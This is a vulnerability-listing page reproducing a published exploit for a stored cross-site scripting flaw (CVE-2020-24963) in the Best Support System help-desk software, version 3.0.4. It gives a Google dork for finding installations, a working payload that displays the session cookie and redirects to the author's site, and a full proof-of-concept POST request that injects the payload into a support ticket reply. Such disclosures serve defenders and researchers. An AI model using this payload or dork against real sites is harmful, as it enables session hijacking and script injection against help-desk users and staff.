Best Support System v3.0.4 – Authenticated Persistent XSS – CXSecurity.com

Vulnerability ID: 2145288
Published: 2020-09-05 Updated: 2020-09-05
CVE ID: CVE-2020-24963

CNNVD-ID N/A
Platform: N/A CVSS score: N/A
Source
https://cxsecurity.com/issue/WLB-2020090026
Vulnerability details
Vulnerability details have not yet been disclosed.
Exploit
[+] :: Exploit Title: Best Support System v3.0.4 - Authenticated Persistent XSS
[+] :: Google Dork: "Powered By Best Support System"
[+] :: Date: 2020-08-23
[+] :: Exploit Author: Ex.Mi [ https://ex-mi.ru ]
[+] :: Vendor: Appsbd [ https://appsbd.com ]
[+] :: Software Version: 3.0.4
[+] :: Software Link: https://codecanyon.net/item/best-support-systemclient-support-desk-help-centre/21357317
[+] :: Tested on: Kali Linux
[+] :: CVE: CVE-2020-24963
[+] :: CWE: CWE-79
[i] :: Info:
An Authenticated Persistent XSS vulnerability was discovered in the Best Support System, tested version — v3.0.4.
[$] :: Payload:
13"-->">'` -- `<!--<img src="--><img src=x onerror=(alert)(`Ex.Mi`);(alert)(document.cookie);location=`https://ex-mi.ru`;>
[!] :: PoC (Burp Suite POST request):
POST /support-system/ticket-confirm/ticket-reply/11.html HTTP/1.1
Host: demo.appsbd.com
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 350
Origin: https://demo.appsbd.com
Connection: close
Referer: https://demo.appsbd.com/support-system/ticket/details/11.html
Cookie: [cookies_here]

app_form=8d1c319d5826a789b3ca3e71516b0c5c&ticket_body=%3Cp%3E%3Cbr%3E%3C%2Fp%3E13%22--%26gt%3B%22%26gt%3B'%60+--+%60%3C!--%3Cimg+src%3D%22--%3E%3Cimg+src%3D%22x%22+onerror%3D%22(alert)(%60Ex_Mi%60)%3B(alert)(document.cookie)%3Blocation%3D%60https%3A%2F%2Fex-mi.ru%60%3B%22%3E&status=&app_form_ajax=ad1ce2b2c3eb943efaa8c239ff53acc2
[+] :: Contacts:
Website: ex-mi.ru
Telegram: @ex_mi
GitHub: @ex-mi
Medium: @ex.mi